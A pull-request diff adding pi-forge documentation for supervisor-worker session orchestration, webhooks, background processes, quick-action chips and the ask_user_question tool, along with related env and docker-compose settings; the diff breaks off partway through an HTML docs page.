### PR TITLE
docs: cover orchestration, webhooks, quick-actions + surface STDIO MCP / processes / todo / ask

### DIFF
--- a/README.md
+++ b/README.md
@@ -95,12 +95,35 @@ For source builds and a development setup see
 - **Workspace tools in one tab** — file browser, tabbed CodeMirror editor with
   ripgrep search, integrated `node-pty` terminal (persists across page refresh),
   and a full git panel (status, diff, stage, commit, push, branch, log).
-- **MCP integration** — connect remote servers over StreamableHTTP / SSE,
-  per-project `.mcp.json`, per-tool toggles, master kill-switch in Settings.
+- **MCP integration** — connect remote servers (StreamableHTTP / SSE) AND
+  local stdio servers; per-project `.mcp.json` with a per-project trust
+  gate on stdio (you opt in once per project), per-tool toggles, master
+  kill-switch in Settings.
 - **Pi-subagents support** — built-in surfacing of the community
   [pi-subagents](https://github.com/nicobailon/pi-subagents) plugin (install
   separately): rich tool card for parent calls, child sessions in the project
   sidebar with cascade-delete on parent removal.
+- **Session orchestration** — opt-in supervisor mode for a session
+  (`ORCHESTRATION_ENABLED=true`, then toggle per-session): adds an
+  `orchestrate_*` tool group so the agent can spawn, observe, message,
+  interrupt, and kill worker sessions in the same project. Worker
+  events stream back into the supervisor's inbox; the supervisor's
+  LLM wakes on activity and reacts.
+- **Webhooks** — HTTPS POST deliveries on agent and session events
+  (`agent_end`, `ask_user_question`, `process_alert`, `auto_retry_end`,
+  `compaction_end`, `session_created`, `session_deleted`). Global or
+  per-project scope, optional HMAC-SHA256 signing, custom headers (Bearer
+  tokens etc., redacted on the wire), delivery history with retries.
+- **Background-process tool** — the `process` tool lets the agent
+  spawn long-running processes (dev servers, watchers, builds) that
+  outlive a single turn. Per-session manager, log capture, regex
+  watches, alerts on exit.
+- **Browser-native `todo` + `ask_user_question` tools** — drop-in
+  contract-compatible implementations of the community plugins; live
+  panel in the chat surface, per-session state.
+- **Quick actions** — operator-defined chips in the chat toolbar
+  that either run a shell command in the active project's cwd or
+  insert/send a templated prompt to the active session.
 - **Provider management** — Anthropic / OpenAI / Google / OpenRouter built-in,
   plus custom OpenAI-compatible endpoints (vLLM, LiteLLM, Ollama, internal
   gateways) via `models.json`.
@@ -128,7 +151,12 @@ The full feature grid (with categories and screenshots) is on the
 
 **Configure & extend**
 - [Configuration & env vars](./docs/configuration.md) — every flag, env var, and pi config file
-- [MCP servers](./docs/mcp.md) — connect remote MCP servers, per-tool toggles
+- [MCP servers](./docs/mcp.md) — remote + stdio servers, per-project trust gate, per-tool toggles
+- [Webhooks](./docs/webhooks.md) — HTTPS POSTs on agent/session events, HMAC signing, retry
+- [Session orchestration](./docs/orchestration.md) — supervisor sessions that spawn and coordinate workers
+- [Background processes](./docs/processes.md) — the `process` tool for dev servers, watchers, builds
+- [`todo` tool](./docs/todo.md) · [`ask_user_question` tool](./docs/ask-user-question.md) — browser-native plugin tools
+- [Quick actions](./docs/quick-actions.md) — operator-defined chat-toolbar chips
 - [Mobile / PWA install](./docs/mobile.md) — "Add to Home Screen" on iOS / Android
 
 **Use programmatically**

--- a/docker/.env.example
+++ b/docker/.env.example
@@ -85,3 +85,19 @@ LOG_LEVEL=info
 # config is set at deploy time and end users only need chat + files.
 # Truthy values: 1, true, yes, on. Default off.
 MINIMAL_UI=false
+
+# ---- Session orchestration ----
+# When `true`, the chat-view `Orch` toggle becomes available so a
+# session can opt in to "supervisor mode" — it gets the
+# `orchestrate_*` tool group and can spawn, observe, message, and
+# control worker sessions in the same project. Off by default;
+# hard-disabled under MINIMAL_UI regardless of this flag. The
+# operator's per-session opt-in is a second gate — turning this on
+# at the instance level just makes the toggle visible, not
+# auto-on. See `docs/orchestration.md`.
+ORCHESTRATION_ENABLED=false
+# Per-supervisor live-worker cap. The bound applies only to LIVE
+# (in-memory) workers — killed/cold workers don't count. Raise for
+# heavy fan-out workflows; lower for cost control on token-expensive
+# setups. Bounded to [1, 100].
+ORCHESTRATION_MAX_WORKERS_PER_SUPERVISOR=8

--- a/docker/docker-compose.yml
+++ b/docker/docker-compose.yml
@@ -43,6 +43,10 @@ services:
       - TRUST_PROXY=${TRUST_PROXY:-false}
       - CORS_ORIGIN=${CORS_ORIGIN:-}
       - MINIMAL_UI=${MINIMAL_UI:-false}
+      # Session orchestration — off by default. Hard-disabled under
+      # MINIMAL_UI regardless of this flag. See docs/orchestration.md.
+      - ORCHESTRATION_ENABLED=${ORCHESTRATION_ENABLED:-false}
+      - ORCHESTRATION_MAX_WORKERS_PER_SUPERVISOR=${ORCHESTRATION_MAX_WORKERS_PER_SUPERVISOR:-8}
     # Hardening (mirrors the k8s manifests). Not read-only because the
     # agent's bash tool needs to write to /home/pi/.npm, /tmp, etc.
     security_opt:

--- a/docs/configuration.md
+++ b/docs/configuration.md
@@ -46,8 +46,10 @@ in `cli.ts`). The most-touched ones:
 | `UI_PASSWORD` | (unset) | Enables browser JWT auth. After the user changes it via the UI, a scrypt hash is persisted to `${FORGE_DATA_DIR}/password-hash` and the env value is ignored. |
 | `API_KEY` | (unset) | Static bearer token for programmatic access. |
 | `JWT_SECRET` | (auto-generated) | HS256 signing key. Auto-generated and persisted to `${FORGE_DATA_DIR}/jwt-secret` (mode 0600) when `UI_PASSWORD` or `password-hash` is in play. Set explicitly (`openssl rand -hex 32`) to override; delete the file to rotate. |
-| `MINIMAL_UI` | `false` | Hide terminal / git / last-turn / providers / agent-settings panels. Frontend gate; server routes unchanged. |
+| `MINIMAL_UI` | `false` | Hide terminal / git / last-turn / providers / agent-settings panels. Frontend gate; server routes unchanged. ALSO hard-disables webhook configuration, session orchestration, and the quick-actions runner. |
 | `TRUST_PROXY` | `false` | Set when behind a reverse proxy so `req.ip` is the real client (required for per-user login rate limits). |
+| `ORCHESTRATION_ENABLED` | `false` | Surface the chat-view `Orch` toggle so sessions can opt in to supervisor mode (`orchestrate_*` tool group, worker spawning, inbox). Hard-disabled under `MINIMAL_UI` regardless. See [`orchestration.md`](./orchestration.md). |
+| `ORCHESTRATION_MAX_WORKERS_PER_SUPERVISOR` | `8` | Per-supervisor live-worker cap. Bounded to `[1, 100]`. |
 
 Production-tuning knobs (rate limits, JWT lifetime, TLS / proxy posture)
 are documented in [`deployment.md`](./deployment.md).
@@ -236,5 +238,15 @@ internals, and override env vars.
   reverse proxy
 - [`mobile.md`](./mobile.md) — mobile / PWA install
 - [`containers.md`](./containers.md) — container internals + bind mounts
-- [`mcp.md`](./mcp.md) — MCP server config reference
+- [`mcp.md`](./mcp.md) — MCP server config reference (remote + stdio)
+- [`webhooks.md`](./webhooks.md) — HTTPS POSTs on agent/session events
+- [`orchestration.md`](./orchestration.md) — supervisor sessions that
+  spawn and coordinate worker sessions
+- [`processes.md`](./processes.md) — background-process tool the
+  agent uses for dev servers, watchers, builds
+- [`todo.md`](./todo.md) — browser-native `todo` tool
+- [`ask-user-question.md`](./ask-user-question.md) — browser-native
+  `ask_user_question` tool
+- [`quick-actions.md`](./quick-actions.md) — operator-defined chat
+  toolbar chips (shell commands + prompt templates)
 - [`SECURITY.md`](../SECURITY.md) — `auth.json` key safety + threat model

--- a/docs/orchestration.md
+++ b/docs/orchestration.md
@@ -1,0 +1,268 @@
+# Session orchestration
+
+A session can act as a **supervisor** that spawns, observes,
+messages, interrupts, and kills other sessions in the same project.
+Off by default; the operator opts in at the instance level with an
+env flag, and each session that should run as a supervisor opts in
+separately from the chat-view toolbar.
+
+> Different from **pi-subagents.** Subagents are LLM-internal child
+> agents scoped to one tool call within a single session. Orchestrated
+> workers are full first-class sessions — they show up in the session
+> picker, have their own transcripts, can be opened directly in the
+> browser, and survive after the supervisor ends.
+
+## Why turn it on
+
+Two concrete workflows the feature is built for:
+
+- **Supervisor watching peers.** A lead session breaks down a goal,
+  spawns one worker per discrete task, watches the worker inbox for
+  turn-ends and ask-user-question requests, and coordinates the
+  overall progress. Useful when work decomposes cleanly into
+  parallel chunks (audit N files, test N components, port N
+  modules).
+- **Handoff pipeline.** Session A finishes its piece of work,
+  spawns session B with a `contextSummary` of what it learned, and
+  detaches. Useful when work is sequential but the context window
+  pressure on a single session would force premature compaction.
+
+## Topology
+
+Strict **hub-and-spoke at depth=1.**
+
+- The supervisor is the hub. Every worker reports to it via the
+  inbox; workers do not see each other.
+- A worker cannot become a supervisor (depth is capped at 1). This
+  is enforced at `enableSupervisor()` and at `registerWorker()` —
+  the store rejects with `depth_limit_exceeded` if you try.
+- Hub-and-spoke is enforced **by the tool surface**, not by a
+  permission check: workers literally don't get the
+  `orchestrate_*` tools, so there's no API for them to express
+  worker→worker comms. There's nothing to enforce because there's
+  nothing to express.
+- **Same-project only** in v1. Cross-project orchestration is
+  intentionally out of scope — it would complicate the data model
+  for a use case the design hasn't seen yet.
+
+## Enabling — two-tier opt-in
+
+### 1. Instance flag (operator)
+
+Set the env var:
+
+```bash
+ORCHESTRATION_ENABLED=true
+```
+
+Or in `docker/.env`:
+
+```
+ORCHESTRATION_ENABLED=true
+```
+
+This makes the chat-view `Orch` toggle button render. It does NOT
+enable supervisor mode for any session — that's the second gate.
+
+**Hard-disabled under `MINIMAL_UI=true`** regardless of this flag.
+MINIMAL_UI deployments are locked-down by design; orchestration
+opens a tool surface the operator probably doesn't want end users
+touching.
+
+### 2. Per-session toggle (user)
+
+Open a session, click the `Orch` button in the chat-view toolbar,
+click **Enable supervisor mode**. The server rebuilds the live
+AgentSession in-place (same SessionManager, fresh `customTools`,
+SSE clients stay attached) so the `orchestrate_*` tools become
+available immediately — no reload, no reconnect.
+
+Disable the same way to drop the tools. Disabling also detaches
+every linked worker (they survive as standalone sessions) and
+clears the supervisor's inbox.
+
+## Tool surface
+
+The supervisor's agent gets eight new tools (all prefixed
+`orchestrate_`):
+
+| Tool | Purpose |
+|---|---|
+| `orchestrate_spawn_worker` | Create a new worker session with a task. `name` is required so the picker stays legible; optional `contextSummary` prepends handoff context to the initial prompt. |
+| `orchestrate_list_workers` | Current state per worker (streaming / idle / cold) with message counts and last-activity timestamps. |
+| `orchestrate_read_worker` | Fetch the worker's most recent messages, rendered as a readable transcript. Default `limit` is **1** (latest message only) — bump only when one-message context isn't enough. |
+| `orchestrate_send_to_worker` | Inject a message into the worker's prompt stream. `mode` chooses between `prompt` (default, new turn or queue), `steer` (interrupt current turn — for course-correction), `followUp` (queue until idle — for next-task assignment). |
+| `orchestrate_interrupt_worker` | Abort the worker's current turn. Session stays live. |
+| `orchestrate_kill_worker` | Dispose the worker session. Optional `deleteOnDisk: true` also removes the `.jsonl`. |
+| `orchestrate_detach_worker` | Drop the supervisor↔worker link; the worker continues as a standalone session. |
+| `orchestrate_read_inbox` | Drain pending worker events (turn-ends, ask-user-question requests, retry failures, process alerts, deletions). Items return oldest-first and get marked delivered. |
+
+Workers do NOT get these tools — that's the topology enforcement.
+
+### Why prompts to workers should read as task briefs
+
+The `initialPrompt` and `send_to_worker.message` parameters are
+described to the supervisor LLM as **tasks, not conversation**.
+Workers are autonomous agents with no shared transcript or memory
+— "can you help me look at the auth stuff" gives the worker
+nothing to act on. "Audit `packages/server/src/auth.ts` for the
+JWT verification path; report yes/no on whether expired tokens are
+rejected" is a usable brief.
+
+## Worker → supervisor wake-up
+
+Worker events route into a per-supervisor inbox queue. Five event
+types:
+
+| Event | Source |
+|---|---|
+| `worker.ended` | Worker's AgentSession emitted `agent_end` |
+| `worker.ask_user` | Worker called `ask_user_question` |
+| `worker.auto_retry_failed` | Worker's SDK auto-retry exhausted on a provider error |
+| `worker.process_alert` | A background process the worker spawned exited (success / failure / external kill) |
+| `worker.deleted` | Worker's session was deleted (cold or live) |
+
+When an event lands, the bridge enqueues it AND tries to wake the
+supervisor with a small `[orchestration] N pending events…` prompt.
+The wake-up only fires when:
+
+1. The supervisor session is live (in the in-memory registry), AND
+2. The supervisor is **idle** (not currently mid-turn), AND
+3. There isn't already an in-flight wake-up for the current idle
+   window (per-supervisor dedupe flag).
+
+If the supervisor is mid-turn, the items wait on the queue.
+Recovery fires another wake-up when the supervisor's own
+`agent_end` lands — closing the "supervisor finished a turn
+without calling `orchestrate_read_inbox`" gap.
+
+The supervisor's LLM is expected to call `orchestrate_read_inbox`
+to drain the queue, then `orchestrate_read_worker` /
+`orchestrate_send_to_worker` to act on individual workers.
+
+## Safety
+
+- **Fanout cap.** Each supervisor can have at most
+  `ORCHESTRATION_MAX_WORKERS_PER_SUPERVISOR` (default 8) **live**
+  workers at a time. Killed / cold workers don't count. Bounded
+  to `[1, 100]` so a typo in env doesn't disable the limit.
+- **Ownership guard.** Every tool that names a `workerId` verifies
+  the worker is linked to *this* supervisor before acting. A
+  confused supervisor LLM can't reach into another supervisor's
+  workers by id-guessing — the worker store is the source of truth.
+- **Depth cap.** Workers cannot themselves become supervisors. No
+  fork-bombs from a buggy prompt loop.
+- **Same-project guard.** `spawn_worker` always spawns into the
+  supervisor's project; the parameter for cross-project doesn't
+  exist in the tool schema.
+- **Audit trail.** Every orchestration tool call and inbox event
+  writes a JSON-line entry to `process.stderr`
+  (`orchestration-inbox-enqueued`, `orchestration-wake-delivered`,
+  `orchestration-wake-failed`, etc.). No separate audit UI by
+  design — operators tail container logs.
+
+## Storage
+
+Two files in `${FORGE_DATA_DIR}`:
+
+| File | Purpose | Mode |
+|---|---|---|
+| `session-orchestration.json` | Supervisor opt-in flags + supervisor↔worker links | `0600` |
+| `orchestrator-inbox.json` | Per-supervisor pending event queue (FIFO-capped at 200 / supervisor) | `0600` |
+
+Same atomic-write + in-process-lock pattern as
+[`webhooks.md`](./webhooks.md). The inbox file can carry assistant-
+message previews — anything the worker's agent has been talking
+about — so it gets the secret-grade `0600` even though it has no
+literal secrets.
+
+## REST surface
+
+The agent-facing tools above are mirrored as REST endpoints the UI
+calls. All are gated by the `ORCHESTRATION_ENABLED` flag and the
+MINIMAL_UI hard gate — they return `403 orchestration_disabled` or
+`403 minimal_ui_disabled` when off.
+
+| Method + path | Purpose |
+|---|---|
+| `GET /api/v1/orchestration/config` | Instance flag + caps. Used by the UI to decide whether to render the toggle. |
+| `GET /api/v1/orchestration/sessions/:id` | Role of a session (`supervisor` / `worker` / `standalone`) + linkage. |
+| `POST /api/v1/orchestration/sessions/:id/enable` | Make the session a supervisor; rebuild the live AgentSession in place. |
+| `POST /api/v1/orchestration/sessions/:id/disable` | Drop supervisor mode; detach workers; clear inbox; rebuild. |
+| `GET /api/v1/orchestration/sessions/:id/workers` | Live worker list for a supervisor (drives the Workers panel). |
+| `GET /api/v1/orchestration/sessions/:id/inbox` | Full inbox history (delivered + pending), newest first. |
+| `POST /api/v1/orchestration/sessions/:id/inbox/clear` | Wipe inbox. |
+| `POST /api/v1/orchestration/sessions/:id/workers/:wid/detach` | UI detach. |
+| `POST /api/v1/orchestration/sessions/:id/workers/:wid/kill` | UI kill (transcript stays on disk; use `DELETE /sessions/:id` to remove it). |
+| `POST /api/v1/orchestration/sessions/:id/workers/:wid/resume` | Force-resume a cold worker into the registry. |
+
+Full schemas: open `/api/docs` in your deploy.
+
+## UI surface
+
+- **Toolbar `Orch` button** — only renders when the instance flag
+  is on. Toggles the per-session Orchestration panel.
+- **Orchestration panel** (collapsible, mounted between the chat
+  toolbar and the message list):
+  - **Standalone** session → "Enable supervisor mode" button.
+  - **Supervisor** session → workers list with state pills
+    (streaming / idle / cold), per-worker Resume / Detach / Kill
+    buttons, pending-inbox badge, expandable inbox history with
+    type-coded labels, "Disable supervisor mode" button, "Clear
+    inbox" button.
+  - **Worker** session → back-link to the supervisor (click to
+    jump), handoff badge if spawned from a `contextSummary`.
+- The panel polls `/orchestration/sessions/:id/workers` and
+  `/inbox` every 4s while open so the live state stays fresh.
+
+## Troubleshooting
+
+**`Orch` button isn't visible.** Either `ORCHESTRATION_ENABLED`
+isn't set in the environment, or `MINIMAL_UI=true` is overriding
+it. Check `GET /api/v1/orchestration/config` — `disabledReason`
+tells you which gate is closed.
+
+**Enabling supervisor mode succeeded but `orchestrate_*` tools
+aren't visible to the agent.** The route rebuilds the live
+AgentSession in place, but only for sessions that are currently
+live in the registry. A cold session needs to be opened (SSE
+attach) first; opening it triggers `resumeSession`, which picks
+up the supervisor flag and includes the tools in `customTools`.
+
+**Supervisor doesn't react to worker activity.** Two failure
+modes to distinguish:
+
+1. The supervisor LLM isn't calling `orchestrate_read_inbox`. The
+   inbox file is being written to; check
+   `${FORGE_DATA_DIR}/orchestrator-inbox.json` and look for
+   `delivered: false` items. The wake-up prompt may have been
+   ignored — strengthen the supervisor's system prompt or
+   instruct it explicitly.
+2. The wake-up isn't firing. Look for
+   `orchestration-wake-delivered` / `orchestration-wake-failed`
+   lines in stderr. A "failed" line usually means the supervisor
+   session has no model configured — supervisors need provider
+   credentials just like any other session.
+
+**`fanout_limit_exceeded` errors.** Spawn was rejected because the
+supervisor already has the max live workers. Either kill some
+(`orchestrate_kill_worker`), detach the ones you no longer care
+about (`orchestrate_detach_worker`), or raise
+`ORCHESTRATION_MAX_WORKERS_PER_SUPERVISOR`.
+
+**`depth_limit_exceeded`.** A worker is trying to become a
+supervisor. v1 disallows this by design — depth is capped at 1.
+
+## See also
+
+- [`webhooks.md`](./webhooks.md) — the other "tell something about
+  agent events" surface. Webhooks fan out OVER HTTPS to external
+  systems; orchestration fans IN to a supervisor session.
+- [`processes.md`](./processes.md) — workers can spawn background
+  processes the same way standalone sessions can; process alerts
+  fed back into the supervisor's inbox as `worker.process_alert`.
+- [`ask-user-question.md`](./ask-user-question.md) — when a worker
+  calls this tool, the supervisor sees a `worker.ask_user` inbox
+  item and can answer via `orchestrate_send_to_worker`.
+- [`CLAUDE.md`](../CLAUDE.md) — file-by-file map of the
+  `packages/server/src/orchestration/` module.

--- a/docs/quick-actions.md
+++ b/docs/quick-actions.md
@@ -1,0 +1,161 @@
+# Quick actions
+
+Operator-defined chips on the chat-view toolbar that either run a
+shell command in the active project's cwd OR insert/send a
+templated prompt to the active session. Configure from
+**Settings → Quick Actions**.
+
+## Two kinds
+
+Each action is one or the other — never both:
+
+| Kind | Discriminator | What happens when clicked |
+|---|---|---|
+| **Command** | `command` is set | pi-forge runs the command in the active project's working directory and renders the result as a `QuickActionRunCard` in the chat. |
+| **Prompt** | `text` is set | The templated prompt either **sends** to the active session (`mode: "send"`) or **inserts** into the composer (`mode: "insert"`) for you to edit before sending. |
+
+Why the split: commands are about "I want to see the output of
+`npm run build` right now" — fast, one-shot, no LLM round trip.
+Prompts are about "I want to say the same thing to the agent
+every time without retyping it" — `Refactor this for clarity`,
+`Add tests for this module`, etc.
+
+## Storage
+
+`${FORGE_DATA_DIR}/quick-actions.json` (mode `0600`). Atomic-write
++ in-process lock pattern, same as the other forge-owned
+JSON files. Single flat array — chips are the operator's
+personal toolbox, global by design rather than per-project.
+
+```json
+[
+  {
+    "id": "build",
+    "name": "Build",
+    "command": "npm run build",
+    "timeoutMs": 60000,
+    "enabled": true
+  },
+  {
+    "id": "refactor",
+    "name": "Refactor for clarity",
+    "text": "Refactor the file I'm currently looking at for clarity. Keep behavior identical.",
+    "mode": "insert",
+    "enabled": true
+  }
+]
+```
+
+## Field reference
+
+| Field | Required | Notes |
+|---|---|---|
+| `id` | yes | UUID generated at create time; stable across renames. |
+| `name` | yes | Label shown on the chip. |
+| `enabled` | optional | Defaults to `true`. Disabled actions stay in the registry but don't render the chip. |
+| `command` | one-of | Shell command string. Required when this is a command action. Capped at 8 KB. |
+| `timeoutMs` | optional (command-only) | Per-run timeout. Default 30 s, ceiling 5 min. |
+| `text` | one-of | Prompt template. Required when this is a prompt action. Capped at 32 KB. |
+| `mode` | optional (prompt-only) | `send` (default for prompts created via UI) or `insert`. |
+
+The store rejects entries with **both** `command` and `text`, or
+**neither** — that's the discriminator integrity check.
+
+## Command execution
+
+- Spawned via `child_process.spawn` with `shell: false` and
+  `["bash", "-lc", command]` as argv, so shell built-ins (pipes,
+  redirects, `&&`) work.
+- **cwd is the active project's path.** The chip is project-scoped
+  at runtime even though chip definitions are global.
+- **Env is scrubbed** through the same allowlist as the integrated
+  terminal (`pty-manager.ts#scrubbedEnv`). Provider API keys from
+  the pi-forge process env do **not** leak into chip-spawned
+  commands by default. Add specific passthrough vars via
+  `TERMINAL_PASSTHROUGH_ENV` (e.g.,
+  `TERMINAL_PASSTHROUGH_ENV=KUBECONFIG,EDITOR`).
+- **Output is captured both streams**, truncated at 1 MB per
+  stream (re-run in the integrated terminal if you need the full
+  output). Truncation surfaces as `truncated: true` on the result.
+- **Disabled under `MINIMAL_UI=true`.** Command runs return 403
+  `minimal_ui_disabled`. The Quick Actions Settings tab itself is
+  hidden; chips don't render in the chat toolbar.
+
+## Prompt actions
+
+- The template text is delivered as a user-role message to the
+  active session — exactly as if the user had typed it.
+- `mode: "send"` posts straight to
+  `POST /api/v1/sessions/:id/prompt`.
+- `mode: "insert"` writes the text into the chat composer; the
+  user can edit before pressing send.
+- Templates are static for v1 — no variable interpolation. If you
+  need per-call dynamism, use `mode: "insert"` and edit at run
+  time.
+- **Available under `MINIMAL_UI=true`**: prompts don't open a
+  shell, they just deliver text to the agent. Same gate as the
+  rest of the chat surface.
+
+## REST surface
+
+| Method + path | Purpose |
+|---|---|
+| `GET /api/v1/quick-actions` | List configured actions (any project context). |
+| `POST /api/v1/quick-actions` | Create. Validates the one-of discriminator + byte caps. |
+| `PUT /api/v1/quick-actions/:id` | Update. Switching kind (command → prompt or vice-versa) drops the now-unused fields. |
+| `DELETE /api/v1/quick-actions/:id` | Remove. |
+| `POST /api/v1/quick-actions/:id/run?projectId=…` | Run a command action against the given project's cwd. Returns `{ success, exitCode, stdout, stderr, durationMs, timedOut, truncated }`. Returns 403 `minimal_ui_disabled` if MINIMAL_UI is on. |
+
+Prompt-mode actions don't have a server-side `run` route — the
+client just posts to the session's `/prompt` endpoint. Full
+schemas at `/api/docs`.
+
+## UI surface
+
+- **Settings → Quick Actions.** Hidden under MINIMAL_UI.
+  Add/edit/delete chips, reorder is by creation order (not yet
+  draggable in v1).
+- **Chat toolbar `QuickActionsMenu`.** Renders the enabled chips
+  for the active project. Click → run (command) or send/insert
+  (prompt). Hidden under MINIMAL_UI.
+- **`QuickActionRunCard`.** Inline card in the chat surface that
+  renders a completed command run — stdout, stderr, exit code,
+  duration, truncation indicator. Lives in the chat transcript so
+  the agent can see what ran (and reference it in subsequent
+  turns).
+
+## Troubleshooting
+
+**Command returns immediately with `exitCode: -1` and
+`stderr: "spawn …"`**: the binary isn't on the agent process's
+PATH. Pi-forge launches commands with the same PATH as the
+parent process; for chips that need `gh`, `kubectl`, etc.,
+ensure they're installed in the container (the shipped image
+already has `git`, `gh`, `ripgrep`, `bash`, `curl`, `less`,
+`procps`).
+
+**Chip ran successfully but the output looks cut off.** Stream
+output caps at 1 MB per stream; `truncated: true` on the result
+means there was more. Re-run in the integrated terminal for the
+full output, or pipe through `head` / `tail` in the command
+itself.
+
+**Chip secrets aren't available.** That's the scrubbed-env
+behaviour — see `TERMINAL_PASSTHROUGH_ENV` in
+[`configuration.md`](./configuration.md#environment-variables).
+Add specific var names to the passthrough allowlist.
+
+**Quick Actions tab missing under MINIMAL_UI.** Intentional. The
+chip surface lets the operator embed arbitrary shell commands;
+under MINIMAL_UI the deployment is locked down and end users
+shouldn't be configuring those. Edit
+`${FORGE_DATA_DIR}/quick-actions.json` directly and restart.
+
+## See also
+
+- [`configuration.md`](./configuration.md) — `FORGE_DATA_DIR`
+  layout, `TERMINAL_PASSTHROUGH_ENV` allowlist.
+- [`processes.md`](./processes.md) — the chip-vs-process
+  distinction. Chips are one-shot synchronous; the `process`
+  tool is for long-running background processes the agent
+  manages.

--- a/docs/site/docs/api.html
+++ b/docs/site/docs/api.html
@@ -44,6 +44,12 @@
         <a href="mobile.html">Mobile</a>
         <a href="api.html" class="active">API Examples</a>
         <a href="mcp.html">MCP Servers</a>
+        <a href="webhooks.html">Webhooks</a>
+        <a href="orchestration.html">Session Orchestration</a>
+        <a href="processes.html">Background Processes</a>
+        <a href="todo.html">Todo Tool</a>
+        <a href="ask-user-question.html">Ask User Question</a>
+        <a href="quick-actions.html">Quick Actions</a>
         <a href="sse-events.html">SSE Events</a>
       </div>
       <div class="sidebar-section">

--- a/docs/site/docs/architecture.html
+++ b/docs/site/docs/architecture.html
@@ -44,6 +44,12 @@
         <a href="mobile.html">Mobile</a>
         <a href="api.html">API Examples</a>
         <a href="mcp.html">MCP Servers</a>
+        <a href="webhooks.html">Webhooks</a>
+        <a href="orchestration.html">Session Orchestration</a>
+        <a href="processes.html">Background Processes</a>
+        <a href="todo.html">Todo Tool</a>
+        <a href="ask-user-question.html">Ask User Question</a>
+        <a href="quick-actions.html">Quick Actions</a>
         <a href="sse-events.html">SSE Events</a>
       </div>
       <div class="sidebar-section">

--- a/docs/site/docs/ask-user-question.html
+++ b/docs/site/docs/ask-user-question.html
@@ -1,0 +1,125 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Ask User Question — pi-forge</title>
+  <meta name="description" content="Browser-native ask_user_question tool — structured questionnaires from the agent.">
+  <link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32'><rect x='1' y='1' width='30' height='30' rx='7' fill='%230d0d10'/><path d='M12 13 H20 M14 13 V21 M18 13 V21' stroke='%23e6e7eb' stroke-width='1.6' stroke-linecap='round' fill='none'/></svg>">
+  <link rel="preconnect" href="https://fonts.googleapis.com">
+  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
+  <link rel="stylesheet" href="../style.css">
+</head>
+<body>
+  <header class="site-header">
+    <div class="header-inner">
+      <a href="../index.html" class="logo">
+        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32" fill="none" aria-hidden="true">
+  <rect x="1" y="1" width="30" height="30" rx="7" fill="#0d0d10"/>
+  <path d="M9 11 L6 16 L9 21" stroke="#10b981" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+  <path d="M23 11 L26 16 L23 21" stroke="#10b981" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+  <path d="M12 13 H20 M14 13 V21 M18 13 V21" stroke="#e6e7eb" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+</svg>
+        pi-forge
+      </a>
+      <nav class="nav-links" id="navLinks">
+        <a href="../index.html#features">Features</a>
+        <a href="../index.html#quickstart">Quick Start</a>
+        <a href="architecture.html">Docs</a>
+        <a href="https://github.com/Devin-Marks/pi-forge" class="nav-cta">GitHub</a>
+      </nav>
+      <button class="mobile-toggle" id="mobileToggle" aria-label="Toggle menu">&#9776;</button>
+    </div>
+  </header>
+
+  <div class="docs-layout">
+    <aside class="docs-sidebar" id="docsSidebar">
+      <div class="sidebar-section">
+        <h4>Documentation</h4>
+        <a href="architecture.html">Architecture</a>
+        <a href="configuration.html">Configuration</a>
+        <a href="containers.html">Containers</a>
+        <a href="deployment.html">Deployment</a>
+        <a href="mobile.html">Mobile</a>
+        <a href="api.html">API Examples</a>
+        <a href="mcp.html">MCP Servers</a>
+        <a href="webhooks.html">Webhooks</a>
+        <a href="orchestration.html">Session Orchestration</a>
+        <a href="processes.html">Background Processes</a>
+        <a href="todo.html">Todo Tool</a>
+        <a href="ask-user-question.html" class="active">Ask User Question</a>
+        <a href="quick-actions.html">Quick Actions</a>
+        <a href="sse-events.html">SSE Events</a>
+      </div>
+      <div class="sidebar-section">
+        <h4>Project</h4>
+        <a href="https://github.com/Devin-Marks/pi-forge">GitHub</a>
+        <a href="https://github.com/Devin-Marks/pi-forge/blob/main/CHANGELOG.md">Changelog</a>
+        <a href="https://github.com/Devin-Marks/pi-forge/blob/main/SECURITY.md">Security</a>
+      </div>
+    </aside>
+
+    <main class="docs-main">
+      <h1>Ask User Question</h1>
+      <p class="docs-subtitle">Browser-native ask_user_question tool — structured questionnaires from the agent.</p>
+<p>pi-forge ships a browser-native implementation of the
+<code>ask_user_question</code> tool: a structured questionnaire the agent can put
+to the user when its instructions are underspecified. Picking
+&quot;PostgreSQL&quot; from a four-option list beats parsing an ambiguous
+free-form reply.</p>
+<h2>How it works</h2>
+<p>When the agent invokes <code>ask_user_question</code>, pi-forge:</p>
+<ol>
+<li>Validates the questionnaire (caps on question / option counts,
+reserved-label guard, byte limits).</li>
+<li>Pushes the questions over SSE to every browser tab watching the
+session.</li>
+<li>Displays an inline panel directly above the chat composer:
+vertical option list for single-select, checkbox list for
+<code>multiSelect: true</code>, side-by-side preview pane when any option
+carries a <code>preview</code> markdown string. The chat scroll stays
+interactive so the user can reread context while answering.</li>
+<li>Holds the agent open until the user submits — or until they click
+<strong>Chat about this</strong> to abandon the questionnaire and continue in
+free-form chat.</li>
+<li>Returns the structured envelope to the agent so it can branch on
+<code>details.answers[].kind</code> and <code>details.cancelled</code>.</li>
+</ol>
+<h2>Disabling the tool</h2>
+<p>The tool appears under <strong>Settings → Tools → Built-in tools</strong>. Toggle
+it off there to filter <code>ask_user_question</code> out of every new session&#39;s
+tool allowlist. Live sessions keep the tool list they were created
+with.</p>
+<h2>Relationship to <code>@juicesharp/rpiv-ask-user-question</code></h2>
+<p>The wire contract — tool name, parameter schema (question / option
+shape, header / label byte caps, reserved labels), and response
+envelope (<code>{ content: [{type:&quot;text&quot;,text}], details: { answers, cancelled, error? } }</code> with answer kinds <code>option | custom | chat | multi</code>) — is contract-compatible with the upstream Pi extension
+<a href="https://github.com/juicesharp/rpiv-mono/tree/main/packages/rpiv-ask-user-question" target="_blank" rel="noopener noreferrer"><code>@juicesharp/rpiv-ask-user-question</code></a>
